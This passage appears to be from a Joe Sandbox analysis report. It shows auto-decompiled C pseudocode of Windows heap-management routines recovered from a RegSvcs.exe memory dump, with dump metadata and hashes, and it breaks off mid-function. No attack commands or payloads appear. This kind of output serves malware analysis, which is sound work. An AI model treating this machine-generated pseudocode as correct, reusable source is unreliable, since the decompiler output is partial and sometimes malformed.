                                          				_t175 = _t113 % 0x1000;
                                          				_v28 = _t113 / 0x1000;
                                          				 *_t183 = _v20;
                                          				_t183[1] =  *(_t182 + 0x54);
                                          				if((_v24 & 0x00001000) != 0) {
                                          					_t117 = E013216C7(1, _t175);
                                          					_t150 = _a20;
                                          					_t183[0xd] = _t117;
                                          				}
                                          				_t183[0xb] = _t183[0xb] & 0x00000000;
                                          				_t176 = _v12;
                                          				_t183[3] = _a12;
                                          				_t119 = _a16;
                                          				_t183[7] = _t119;
                                          				_t161 = _v16 << 0xc;
                                          				_t183[6] = _t182;
                                          				_t183[0xa] = _t119 + _t161;
                                          				_t183[8] = _v16;
                                          				_t122 =  &(_t183[0xe]);
                                          				_t183[2] = 0xffeeffee;
                                          				_t183[9] = _t176;
                                          				 *((intOrPtr*)(_t182 + 0x1e8)) =  *((intOrPtr*)(_t182 + 0x1e8)) + _t161;
                                          				 *((intOrPtr*)(_t182 + 0x1e4)) =  *((intOrPtr*)(_t182 + 0x1e4)) + _t161;
                                          				_t122[1] = _t122;
                                          				 *_t122 = _t122;
                                          				if(_t183[6] != _t183) {
                                          					_t124 = 1;
                                          				} else {
                                          					_t124 = 0;
                                          				}
                                          				_t183[1] = _t124;
                                          				 *(_t176 + 4) =  *_t183 ^  *(_t182 + 0x54);
                                          				if(_t183[6] != _t183) {
                                          					_t130 = (_t176 - _t183 >> 0x10) + 1;
                                          					_v24 = _t130;
                                          					if(_t130 >= 0xfe) {
                                          						_push(_t161);
                                          						_push(0);
                                          						E013BA80D(_t183[6], 3, _t176, _t183);
                                          						_t150 = _a20;
                                          						_t176 = _v12;
                                          						_t130 = _v24;
                                          					}
                                          				} else {
                                          					_t130 = 0;
                                          				}
                                          				 *(_t176 + 6) = _t130;
                                          				E0131B73D(_t182, _t183, _t150 - 0x18, _v28 << 0xc, _t176,  &_v8);
                                          				if( *((intOrPtr*)(_t182 + 0x4c)) != 0) {
                                          					_t183[0] = _t183[0] ^  *_t183 ^ _t183[0];
                                          					 *_t183 =  *_t183 ^  *(_t182 + 0x50);
                                          				}
                                          				if(_v8 != 0) {
                                          					E0131A830(_t182, _v12, _v8);
                                          				}
                                          				_t136 = _t182 + 0xa4;
                                          				_t184 =  &(_t183[4]);
                                          				_t163 =  *(_t136 + 4);
                                          				if( *_t163 != _t136) {
                                          					_push(_t163);
                                          					_push( *_t163);
                                          					E013BA80D(0, 0xd, _t136, 0);
                                          				} else {
                                          					 *_t184 = _t136;
                                          					_t184[1] = _t163;
                                          					 *_t163 = _t184;
                                          					 *(_t136 + 4) = _t184;
                                          				}
                                          				 *((intOrPtr*)(_t182 + 0x1f4)) =  *((intOrPtr*)(_t182 + 0x1f4)) + 1;
                                          				return 1;
                                          			}
































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                          • Instruction ID: f4ee7ec0aa5e56e548ed4258830269c7d61d34a5db07abf601f4322443648d9a
                                          • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                          • Instruction Fuzzy Hash: A081AC71A00745DFCB24DF68C584BAABBF9EF48358F148569E94AC7751D330EA41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E0138B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _t80;
                                          				signed int _t83;
                                          				intOrPtr _t89;
                                          				signed int _t92;
                                          				signed char _t106;
                                          				signed int* _t107;
                                          				intOrPtr _t108;
                                          				intOrPtr _t109;
                                          				signed int _t114;
                                          				void* _t115;
                                          				void* _t117;
                                          				void* _t119;
                                          				void* _t122;
                                          				signed int _t123;
                                          				signed int* _t124;
                                          
                                          				_t106 = _a12;
                                          				if((_t106 & 0xfffffffc) != 0) {
                                          					return 0xc000000d;
                                          				}
                                          				if((_t106 & 0x00000002) != 0) {
                                          					_t106 = _t106 | 0x00000001;
                                          				}
                                          				_t109 =  *0x13e7b9c; // 0x0
                                          				_t124 = L01314620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                          				if(_t124 != 0) {
                                          					 *_t124 =  *_t124 & 0x00000000;
                                          					_t124[1] = _t124[1] & 0x00000000;
                                          					_t124[4] = _t124[4] & 0x00000000;
                                          					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                          						L13:
                                          						_push(_t124);
                                          						if((_t106 & 0x00000002) != 0) {
                                          							_push(0x200);
                                          							_push(0x28);
                                          							_push(0xffffffff);
                                          							_t122 = E01339800();
                                          							if(_t122 < 0) {
                                          								L33:
                                          								if((_t124[4] & 0x00000001) != 0) {
                                          									_push(4);
                                          									_t64 =  &(_t124[1]); // 0x4
                                          									_t107 = _t64;
                                          									_push(_t107);
                                          									_push(5);
                                          									_push(0xfffffffe);
                                          									E013395B0();
                                          									if( *_t107 != 0) {
                                          										_push( *_t107);
                                          										E013395D0();
                                          									}
                                          								}
                                          								_push(_t124);
                                          								_push(0);
                                          								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                          								L37:
                                          								L013177F0();
                                          								return _t122;
                                          							}
                                          							_t124[4] = _t124[4] | 0x00000002;
                                          							L18:
                                          							_t108 = _a8;
                                          							_t29 =  &(_t124[0x105]); // 0x414
                                          							_t80 = _t29;
                                          							_t30 =  &(_t124[5]); // 0x14
                                          							_t124[3] = _t80;
                                          							_t123 = 0;
                                          							_t124[2] = _t30;
                                          							 *_t80 = _t108;
                                          							if(_t108 == 0) {
                                          								L21:
                                          								_t112 = 0x400;
                                          								_push( &_v8);
                                          								_v8 = 0x400;
                                          								_push(_t124[2]);
                                          								_push(0x400);
                                          								_push(_t124[3]);
                                          								_push(0);
                                          								_push( *_t124);
                                          								_t122 = E01339910();
                                          								if(_t122 != 0xc0000023) {
                                          									L26:
                                          									if(_t122 != 0x106) {
                                          										L40:
                                          										if(_t122 < 0) {
                                          											L29:
                                          											_t83 = _t124[2];
                                          											if(_t83 != 0) {
                                          												_t59 =  &(_t124[5]); // 0x14
                                          												if(_t83 != _t59) {
                                          													L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                          												}
                                          											}
                                          											_push( *_t124);
                                          											E013395D0();
                                          											goto L33;
                                          										}
                                          										 *_a16 = _t124;
                                          										return 0;
                                          									}
                                          									if(_t108 != 1) {
                                          										_t122 = 0;
                                          										goto L40;
                                          									}
                                          									_t122 = 0xc0000061;
                                          									goto L29;
                                          								} else {
                                          									goto L22;
                                          								}
                                          								while(1) {
                                          									L22:
                                          									_t89 =  *0x13e7b9c; // 0x0
                                          									_t92 = L01314620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                          									_t124[2] = _t92;
                                          									if(_t92 == 0) {
                                          										break;
                                          									}
                                          									_t112 =  &_v8;
                                          									_push( &_v8);
                                          									_push(_t92);
                                          									_push(_v8);
                                          									_push(_t124[3]);
                                          									_push(0);
                                          									_push( *_t124);
                                          									_t122 = E01339910();
                                          									if(_t122 != 0xc0000023) {
                                          										goto L26;
                                          									}
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                          								}
                                          								_t122 = 0xc0000017;
                                          								goto L26;
                                          							}
                                          							_t119 = 0;
                                          							do {
                                          								_t114 = _t124[3];
                                          								_t119 = _t119 + 0xc;
                                          								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                          								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                          								_t123 = _t123 + 1;
                                          								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                          							} while (_t123 < _t108);
                                          							goto L21;
                                          						}
                                          						_push(0x28);
                                          						_push(3);
                                          						_t122 = E012FA7B0();
                                          						if(_t122 < 0) {
                                          							goto L33;
                                          						}
                                          						_t124[4] = _t124[4] | 0x00000001;
                                          						goto L18;
                                          					}
                                          					if((_t106 & 0x00000001) == 0) {
                                          						_t115 = 0x28;
                                          						_t122 = E0138E7D3(_t115, _t124);
                                          						if(_t122 < 0) {
                                          							L9:
                                          							_push(_t124);
                                          							_push(0);
                                          							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                          							goto L37;
                                          						}
                                          						L12:
                                          						if( *_t124 != 0) {
                                          							goto L18;
                                          						}
                                          						goto L13;
                                          					}
                                          					_t15 =  &(_t124[1]); // 0x4
                                          					_t117 = 4;
                                          					_t122 = E0138E7D3(_t117, _t15);
                                          					if(_t122 >= 0) {
                                          						_t124[4] = _t124[4] | 0x00000001;
                                          						_v12 = _v12 & 0x00000000;
                                          						_push(4);
                                          						_push( &_v12);
                                          						_push(5);
                                          						_push(0xfffffffe);
                                          						E013395B0();
                                          						goto L12;
                                          					}
                                          					goto L9;
                                          				} else {
                                          					return 0xc0000017;
                                          				}
                                          			}





















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db37d9727141f2678b1eabfab2a70ff521c43482df5f53f82907001b3bf2a0af
                                          • Instruction ID: 13ec5246b9fbff1e9fac9fcb57c19e14c6d482874f6c7b5f0c97f7c10b5e4ac0
                                          • Opcode Fuzzy Hash: db37d9727141f2678b1eabfab2a70ff521c43482df5f53f82907001b3bf2a0af
                                          • Instruction Fuzzy Hash: 0C710F32200B07EFE732AF18C840F66FBE5EB44728F144528E6558B6A8DB75E941CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E01376DC9(signed int __ecx, void* __edx) {
                                          				unsigned int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				char _v44;
                                          				char _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _t87;
                                          				void* _t95;
                                          				signed char* _t96;
                                          				signed int _t107;
                                          				signed int _t136;
                                          				signed char* _t137;
                                          				void* _t157;
                                          				void* _t161;
                                          				void* _t167;
                                          				intOrPtr _t168;
                                          				void* _t174;
                                          				void* _t175;
                                          				signed int _t176;
                                          				void* _t177;
                                          
                                          				_t136 = __ecx;
                                          				_v44 = 0;
                                          				_t167 = __edx;
                                          				_v40 = 0;
                                          				_v36 = 0;
                                          				_v32 = 0;
                                          				_v60 = 0;
                                          				_v56 = 0;
                                          				_v52 = 0;
                                          				_v48 = 0;
                                          				_v16 = __ecx;
                                          				_t87 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                          				_t175 = _t87;
                                          				if(_t175 != 0) {
                                          					_t11 = _t175 + 0x30; // 0x30
                                          					 *((short*)(_t175 + 6)) = 0x14d4;
                                          					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                          					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                          					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                          					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                          					E01376B4C(_t167, _t11, 0x214,  &_v8);
                                          					_v12 = _v8 + 0x10;
                                          					_t95 = E01317D50();
                                          					_t137 = 0x7ffe0384;
                                          					if(_t95 == 0) {
                                          						_t96 = 0x7ffe0384;
                                          					} else {
                                          						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					}
                                          					_push(_t175);
                                          					_push(_v12);
                                          					_push(0x402);
                                          					_push( *_t96 & 0x000000ff);
                                          					E01339AE0();
                                          					_t87 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                          					_t176 = _v16;
                                          					if((_t176 & 0x00000100) != 0) {
                                          						_push( &_v36);
                                          						_t157 = 4;
                                          						_t87 = E0137795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                          						if(_t87 >= 0) {
                                          							_v24 = E0137795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                          							_v28 = E0137795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                          							_push( &_v52);
                                          							_t161 = 5;
                                          							_t168 = E0137795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                          							_v20 = _t168;
                                          							_t107 = L01314620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                          							_v16 = _t107;
                                          							if(_t107 != 0) {
                                          								_v8 = _v8 & 0x00000000;
                                          								 *(_t107 + 0x20) = _t176;
                                          								 *((short*)(_t107 + 6)) = 0x14d5;
                                          								_t47 = _t107 + 0x24; // 0x24
                                          								_t177 = _t47;
                                          								E01376B4C( &_v36, _t177, 0xc78,  &_v8);
                                          								_t51 = _v8 + 4; // 0x4
                                          								_t178 = _t177 + (_v8 >> 1) * 2;
                                          								_v12 = _t51;
                                          								E01376B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                          								_v12 = _v12 + _v8;
                                          								E01376B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                          								_t125 = _v8;
                                          								_v12 = _v12 + _v8;
                                          								E01376B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                          								_t174 = _v12 + _v8;
                                          								if(E01317D50() != 0) {
                                          									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          								}
                                          								_push(_v16);
                                          								_push(_t174);
                                          								_push(0x402);
                                          								_push( *_t137 & 0x000000ff);
                                          								E01339AE0();
                                          								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                          								_t168 = _v20;
                                          							}
                                          							_t87 = L01312400( &_v36);
                                          							if(_v24 >= 0) {
                                          								_t87 = L01312400( &_v44);
                                          							}
                                          							if(_t168 >= 0) {
                                          								_t87 = L01312400( &_v52);
                                          							}
                                          							if(_v28 >= 0) {
                                          								return L01312400( &_v60);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t87;
                                          			}
































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: 1047db19d71545cc51ac97ccd1c04f0a400f6b803bbe5a1b201c37f8e3680ac4
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: 53718D71E0060AEFDB15DFA9C984EEEBBB9FF48718F144469E504E7250DB34AA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013B1002(intOrPtr __ecx, void* __edx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed int _t75;
                                          				intOrPtr* _t76;
                                          				signed int _t77;
                                          				signed short _t78;
                                          				signed short _t80;
                                          				signed int _t81;
                                          				signed short _t82;
                                          				signed short _t83;
                                          				signed short _t85;
                                          				signed int _t86;
                                          				void* _t90;
                                          				signed short _t91;
                                          				signed int _t95;
                                          				signed short _t97;
                                          				signed short _t99;
                                          				intOrPtr* _t101;
                                          				signed short _t102;
                                          				signed int _t103;
                                          				signed short _t105;
                                          				intOrPtr _t106;
                                          				signed int* _t108;
                                          				signed short _t109;
                                          				signed short _t111;
                                          				signed short _t112;
                                          				signed int _t113;
                                          				signed short _t117;
                                          				signed int _t120;
                                          				void* _t121;
                                          				signed int _t122;
                                          				signed int _t126;
                                          				signed int* _t127;
                                          				signed short _t128;
                                          				intOrPtr _t129;
                                          				intOrPtr _t130;
                                          				signed int _t132;
                                          				signed int _t133;
                                          
                                          				_t121 = __edx;
                                          				_t130 = __ecx;
                                          				_v16 = __ecx;
                                          				_t108 = __ecx + 0xa4;
                                          				_t75 =  *_t108;
                                          				L4:
                                          				L4:
                                          				if(_t75 != _t108) {
                                          					goto L1;
                                          				} else {
                                          					_t127 = _t130 + 0x9c;
                                          					_t120 =  *_t127;
                                          				}
                                          				while(_t120 != _t127) {
                                          					_t132 = _t120 & 0xffff0000;
                                          					__eflags = _t132 - _t121;
                                          					if(_t132 <= _t121) {
                                          						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
                                          						__eflags = _t75 - _t121;
                                          						if(_t75 > _t121) {
                                          							 *0x13e5898 = 5;
                                          						}
                                          					}
                                          					_t120 =  *_t120;
                                          				}
                                          				L68:
                                          				return _t75;
                                          				L1:
                                          				_t3 = _t75 - 0x10; // -16
                                          				_t126 = _t3;
                                          				_v20 = _t126;
                                          				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
                                          				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
                                          					L3:
                                          					_t75 =  *_t75;
                                          					goto L4;
                                          				}
                                          				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
                                          				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
                                          					_t8 = _t126 + 0x38; // 0x28
                                          					_t101 = _t8;
                                          					_t109 = 0;
                                          					_v8 = _v8 & 0;
                                          					_t76 =  *_t101;
                                          					_v12 = _t101;
                                          					__eflags = _t76 - _t101;
                                          					if(_t76 == _t101) {
                                          						L17:
                                          						_t102 = 0;
                                          						_v20 = 0;
                                          						__eflags = _t109;
                                          						if(_t109 == 0) {
                                          							_t109 = _t126;
                                          						}
                                          						_t128 = 0;
                                          						__eflags = _t109 - _t121;
                                          						if(_t109 >= _t121) {
                                          							L29:
                                          							_t111 = _v8 + 0xfffffff8;
                                          							__eflags = _t111 - _t121;
                                          							if(_t111 <= _t121) {
                                          								L33:
                                          								 *0x13e58b0 = _t128;
                                          								 *0x13e58b4 = _t102;
                                          								__eflags = _t128;
                                          								if(_t128 == 0) {
                                          									L42:
                                          									__eflags =  *(_t130 + 0x4c);
                                          									if( *(_t130 + 0x4c) == 0) {
                                          										_t77 =  *_t128 & 0x0000ffff;
                                          										_t112 = 0;
                                          										__eflags = 0;
                                          									} else {
                                          										_t85 =  *_t128;
                                          										_t112 =  *(_t130 + 0x4c);
                                          										__eflags = _t85 & _t112;
                                          										if((_t85 & _t112) != 0) {
                                          											_t85 = _t85 ^  *(_t130 + 0x50);
                                          											__eflags = _t85;
                                          										}
                                          										_t77 = _t85 & 0x0000ffff;
                                          									}
                                          									_v8 = _t77;
                                          									__eflags = _t102;
                                          									if(_t102 != 0) {
                                          										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
                                          										__eflags = _t117;
                                          										 *0x13e58b8 = _t117;
                                          										_t112 =  *(_t130 + 0x4c);
                                          									}
                                          									__eflags = _t112;
                                          									if(_t112 == 0) {
                                          										_t78 =  *_t128 & 0x0000ffff;
                                          									} else {
                                          										_t83 =  *_t128;
                                          										__eflags =  *(_t130 + 0x4c) & _t83;
                                          										if(( *(_t130 + 0x4c) & _t83) != 0) {
                                          											_t83 = _t83 ^  *(_t130 + 0x50);
                                          											__eflags = _t83;
                                          										}
                                          										_t78 = _t83 & 0x0000ffff;
                                          									}
                                          									_t122 = _t78 & 0x0000ffff;
                                          									 *0x13e58bc = _t122;
                                          									__eflags =  *(_t130 + 0x4c);
                                          									_t113 = _v8 & 0x0000ffff;
                                          									if( *(_t130 + 0x4c) == 0) {
                                          										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
                                          									} else {
                                          										_t82 =  *(_t128 + _t113 * 8);
                                          										__eflags =  *(_t130 + 0x4c) & _t82;
                                          										if(( *(_t130 + 0x4c) & _t82) != 0) {
                                          											_t82 = _t82 ^  *(_t130 + 0x50);
                                          											__eflags = _t82;
                                          										}
                                          										_t122 =  *0x13e58bc; // 0x0
                                          										_t80 = _t82 & 0x0000ffff;
                                          									}
                                          									_t81 = _t80 & 0x0000ffff;
                                          									__eflags =  *0x13e58b8 - _t81; // 0x0
                                          									if(__eflags == 0) {
                                          										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
                                          										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
                                          										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
                                          											goto L68;
                                          										}
                                          										 *0x13e5898 = 7;
                                          										return _t75;
                                          									} else {
                                          										 *0x13e5898 = 6;
                                          										return _t81;
                                          									}
                                          								}
                                          								__eflags = _t102;
                                          								if(_t102 == 0) {
                                          									goto L42;
                                          								}
                                          								__eflags =  *(_t130 + 0x4c);
                                          								if( *(_t130 + 0x4c) == 0) {
                                          									_t86 =  *_t128 & 0x0000ffff;
                                          								} else {
                                          									_t91 =  *_t128;
                                          									__eflags =  *(_t130 + 0x4c) & _t91;
                                          									if(( *(_t130 + 0x4c) & _t91) != 0) {
                                          										_t91 = _t91 ^  *(_t130 + 0x50);
                                          										__eflags = _t91;
                                          									}
                                          									_t86 = _t91 & 0x0000ffff;
                                          								}
                                          								_v8 = _t86;
                                          								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
                                          								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
                                          								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
                                          									goto L42;
                                          								} else {
                                          									 *0x13e5898 = 4;
                                          									return _t90;
                                          								}
                                          							}
                                          							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
                                          							while(1) {
                                          								_t102 = _t111;
                                          								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
                                          								__eflags = _t95;
                                          								if(_t95 == 0) {
                                          									goto L33;
                                          								}
                                          								_t111 = _t111 + _t95 * 0xfffffff8;
                                          								__eflags = _t111 - _t121;
                                          								if(_t111 > _t121) {
                                          									continue;
                                          								}
                                          								goto L33;
                                          							}
                                          							goto L33;
                                          						} else {
                                          							_t103 =  *(_t130 + 0x4c);
                                          							while(1) {
                                          								_t128 = _t109;
                                          								__eflags = _t103;
                                          								if(_t103 == 0) {
                                          									_t97 =  *_t109 & 0x0000ffff;
                                          								} else {
                                          									_t99 =  *_t109;
                                          									_t103 =  *(_t130 + 0x4c);
                                          									__eflags = _t99 & _t103;
                                          									if((_t99 & _t103) != 0) {
                                          										_t99 = _t99 ^  *(_t130 + 0x50);
                                          										__eflags = _t99;
                                          									}
                                          									_t97 = _t99 & 0x0000ffff;
                                          								}
                                          								__eflags = _t97;
                                          								if(_t97 == 0) {
                                          									break;
                                          								}
                                          								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
                                          								__eflags = _t109 - _t121;
                                          								if(_t109 < _t121) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							_t102 = _v20;
                                          							goto L29;
                                          						}
                                          					}
                                          					_t133 = _v8;
                                          					do {
                                          						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
                                          						_t129 = _v12;
                                          						__eflags = _t105 - _t121;
                                          						if(_t105 < _t121) {
                                          							__eflags = _t105 - _t109;
                                          							if(_t105 > _t109) {
                                          								_t109 = _t105;
                                          							}
                                          						}
                                          						_t106 =  *((intOrPtr*)(_t76 + 8));
                                          						__eflags = _t106 - _t121;
                                          						if(_t106 > _t121) {
                                          							__eflags = _t133;
                                          							if(_t133 == 0) {
                                          								L14:
                                          								_t18 = _t76 - 8; // -8
                                          								_t133 = _t18;
                                          								goto L15;
                                          							}
                                          							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
                                          							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
                                          								goto L15;
                                          							}
                                          							goto L14;
                                          						}
                                          						L15:
                                          						_t76 =  *_t76;
                                          						__eflags = _t76 - _t129;
                                          					} while (_t76 != _t129);
                                          					_t126 = _v20;
                                          					_v8 = _t133;
                                          					_t130 = _v16;
                                          					goto L17;
                                          				}
                                          				goto L3;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad0deb4db30b6afc970420fdf94b09ce45b1a0ffe221f60b3260279cadc39faa
                                          • Instruction ID: 36a903e50aef96baa935a3ccf2b5f3cd09c705e5c2a9a015ddc1d8b3599a2446
                                          • Opcode Fuzzy Hash: ad0deb4db30b6afc970420fdf94b09ce45b1a0ffe221f60b3260279cadc39faa
                                          • Instruction Fuzzy Hash: FD719238B00765CBDB24CF59E4E06BAB7F5FB44308B24446EDA928BA40E771E950CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E0139CB4F(signed int __ecx) {
                                          				signed int _v8;
                                          				unsigned int* _v12;
                                          				intOrPtr* _v16;
                                          				signed int _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t55;
                                          				signed int _t57;
                                          				signed int _t61;
                                          				signed int _t63;
                                          				intOrPtr* _t79;
                                          				unsigned int* _t80;
                                          				signed int _t82;
                                          				signed int* _t84;
                                          				signed char _t88;
                                          				signed char _t93;
                                          				signed int _t100;
                                          				signed int _t103;
                                          				signed short _t104;
                                          				unsigned int _t107;
                                          				unsigned int _t111;
                                          				signed int _t114;
                                          				signed short* _t115;
                                          				void* _t118;
                                          				signed short* _t119;
                                          				signed int _t120;
                                          
                                          				_t120 = __ecx;
                                          				_v12 = 0;
                                          				_t118 = __ecx + 0xc0;
                                          				_t79 =  *((intOrPtr*)(_t118 + 4));
                                          				if(_t118 == _t79) {
                                          					_t80 = 0;
                                          					L38:
                                          					return _t80;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				do {
                                          					L1:
                                          					_t119 = _t79 - 8;
                                          					_v16 = _t79;
                                          					if( *(_t120 + 0x4c) != 0) {
                                          						_t107 =  *(_t120 + 0x50) ^  *_t119;
                                          						 *_t119 = _t107;
                                          						_t88 = _t107 >> 0x00000010 ^ _t107 >> 0x00000008 ^ _t107;
                                          						_t123 = _t107 >> 0x18 - _t88;
                                          						if(_t107 >> 0x18 != _t88) {
                                          							E013AFA2B(_t79, _t120, _t119, _t119, _t120, _t123, _t88);
                                          						}
                                          					}
                                          					_t82 =  *_t119 & 0x0000ffff;
                                          					_t79 =  *_t79;
                                          					_v20 = _t82;
                                          					_v8 = _t82;
                                          					if((_t119[1] & 0x00000008) == 0) {
                                          						_t84 = E013199BF(_t120, _t119,  &_v8, 1);
                                          						__eflags = _v8 - _v20;
                                          						if(_v8 == _v20) {
                                          							_t103 = _v12;
                                          							__eflags = _t103;
                                          							if(_t103 == 0) {
                                          								L29:
                                          								_v12 = _t84;
                                          								L30:
                                          								__eflags =  *(_t120 + 0x4c);
                                          								if(__eflags != 0) {
                                          									_t84[0] = _t84[0] ^ _t84[0] ^  *_t84;
                                          									 *_t84 =  *_t84 ^  *(_t120 + 0x50);
                                          									__eflags =  *_t84;
                                          								}
                                          								goto L32;
                                          							}
                                          							__eflags =  *_t103 -  *_t84;
                                          							if( *_t103 >=  *_t84) {
                                          								goto L30;
                                          							}
                                          							goto L29;
                                          						}
                                          						__eflags = _t84 - _t119;
                                          						if(_t84 == _t119) {
                                          							L24:
                                          							_push(1);
                                          							_push(_v8);
                                          							_t115 = _t84;
                                          							L25:
                                          							E0131A309(_t120, _t115);
                                          							L26:
